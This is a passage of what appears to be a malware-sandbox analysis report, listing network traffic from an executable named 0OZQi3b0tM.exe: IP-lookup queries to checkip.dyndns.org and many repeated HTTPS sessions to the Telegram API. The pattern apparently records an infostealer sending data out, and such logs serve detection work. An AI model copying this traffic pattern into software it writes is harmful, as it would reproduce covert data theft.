                                                                    Jun 26, 2022 09:34:45.953582048 CEST50231443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:45.954399109 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:45.954477072 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:45.954643011 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:45.954921007 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:45.954946995 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.016213894 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.018892050 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.018937111 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.019053936 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.019062996 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.332168102 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.332277060 CEST44350232149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.332417011 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.333005905 CEST50232443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.334400892 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.334445000 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.334553003 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.334871054 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.334887028 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.394210100 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.397555113 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.397608042 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.397727966 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.397747040 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.710484982 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.710572004 CEST44350233149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.710628033 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.710968018 CEST50233443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.711687088 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.711719036 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.711807013 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.712018967 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.712030888 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.772190094 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.774333954 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.774357080 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:46.774436951 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:46.774444103 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.099369049 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.099445105 CEST44350234149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.099510908 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.100016117 CEST50234443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.101103067 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.101135015 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.101273060 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.101665974 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.101681948 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.162226915 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.165173054 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.165196896 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.165307045 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.165316105 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.477381945 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.477477074 CEST44350235149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.477603912 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.478254080 CEST50235443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.479114056 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.479142904 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.479269981 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.479662895 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.479676962 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.541903973 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.545584917 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.545639038 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.545742035 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.545766115 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.855927944 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.856002092 CEST44350236149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.856110096 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.856487036 CEST50236443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.857122898 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.857177973 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.857289076 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.857675076 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.857695103 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.918627024 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.922024012 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.922081947 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:47.922143936 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:47.922161102 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.241333961 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.241420031 CEST44350237149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.241483927 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.241866112 CEST50237443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.242518902 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.242572069 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.242671967 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.243098974 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.243125916 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.307090044 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.310338020 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.310376883 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.310447931 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.310461998 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.632683992 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.632770061 CEST44350238149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.632833958 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.633502960 CEST50238443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.634263992 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.634299040 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.634433031 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.634720087 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.634730101 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.694680929 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.698214054 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.698239088 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:48.698643923 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:48.698654890 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.016632080 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.016752958 CEST44350239149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.016864061 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.017254114 CEST50239443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.017877102 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.017942905 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.018074036 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.018424034 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.018450022 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.074439049 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.076464891 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.076509953 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.076613903 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.076627016 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.595818996 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.595937967 CEST44350240149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.596113920 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.596574068 CEST50240443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.600279093 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.600348949 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.601238966 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.601290941 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.601303101 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.659037113 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.663331985 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.663367033 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.663901091 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.663908005 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.985732079 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.985917091 CEST44350241149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.988015890 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.988132000 CEST50241443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.988862991 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.988909960 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:49.992199898 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.992552042 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:49.992573023 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.050671101 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.055464029 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.055517912 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.055674076 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.055689096 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.360788107 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.360893965 CEST44350242149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.360964060 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.361291885 CEST50242443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.362226963 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.362267017 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.362442017 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.362751961 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.362771034 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.420840979 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.427018881 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.427084923 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.427195072 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.427207947 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.734549046 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.734639883 CEST44350243149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.734750032 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.735225916 CEST50243443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.735902071 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.735934019 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.736025095 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.736296892 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.736305952 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.797095060 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.799710035 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.799736023 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:50.799828053 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:50.799837112 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.108022928 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.108119965 CEST44350244149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.108181953 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.108928919 CEST50244443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.110419035 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.110464096 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.110562086 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.110970974 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.110987902 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.172194004 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.175707102 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.175744057 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.175848961 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.175858974 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.500704050 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.500785112 CEST44350245149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.500859022 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.501341105 CEST50245443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.502108097 CEST50247443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.502141953 CEST44350247149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.502254009 CEST50247443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.502547979 CEST50247443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.502558947 CEST44350247149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.558366060 CEST44350247149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.561306953 CEST50247443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.561326027 CEST44350247149.154.167.220192.168.2.5
                                                                    Jun 26, 2022 09:34:51.561393023 CEST50247443192.168.2.5149.154.167.220
                                                                    Jun 26, 2022 09:34:51.561398983 CEST44350247149.154.167.220192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 26, 2022 09:32:22.474344969 CEST5432253192.168.2.58.8.8.8
                                                                    Jun 26, 2022 09:32:22.496325970 CEST53543228.8.8.8192.168.2.5
                                                                    Jun 26, 2022 09:32:22.522830963 CEST6270453192.168.2.58.8.8.8
                                                                    Jun 26, 2022 09:32:22.542670965 CEST53627048.8.8.8192.168.2.5
                                                                    Jun 26, 2022 09:32:24.707330942 CEST5393453192.168.2.58.8.8.8
                                                                    Jun 26, 2022 09:32:24.726130962 CEST53539348.8.8.8192.168.2.5
                                                                    Jun 26, 2022 09:34:16.948779106 CEST5211353192.168.2.58.8.8.8
                                                                    Jun 26, 2022 09:34:16.969172001 CEST53521138.8.8.8192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jun 26, 2022 09:32:22.474344969 CEST192.168.2.58.8.8.80x7988Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.522830963 CEST192.168.2.58.8.8.80x1128Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:24.707330942 CEST192.168.2.58.8.8.80xdad8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:34:16.948779106 CEST192.168.2.58.8.8.80x3900Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:32:24.726130962 CEST8.8.8.8192.168.2.50xdad8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:34:16.969172001 CEST8.8.8.8192.168.2.50x3900No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                    • api.telegram.org
                                                                    • checkip.dyndns.org
                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549759149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.549769149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    10192.168.2.549778149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    100192.168.2.549947149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    101192.168.2.549948149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    102192.168.2.549949149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    103192.168.2.549950149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    104192.168.2.549951149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    105192.168.2.549952149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    106192.168.2.549953149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    107192.168.2.549954149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    108192.168.2.549955149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    109192.168.2.549956149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    11192.168.2.549779149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    110192.168.2.549957149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    111192.168.2.549962149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    112192.168.2.549964149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    113192.168.2.549965149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    114192.168.2.549966149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    115192.168.2.549967149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    116192.168.2.549968149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    117192.168.2.549969149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    118192.168.2.549970149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    119192.168.2.549972149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    12192.168.2.549780149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    120192.168.2.549973149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    121192.168.2.549974149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    122192.168.2.549975149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    123192.168.2.549976149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    124192.168.2.549977149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    125192.168.2.549978149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    126192.168.2.549979149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    127192.168.2.549980149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    128192.168.2.549982149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
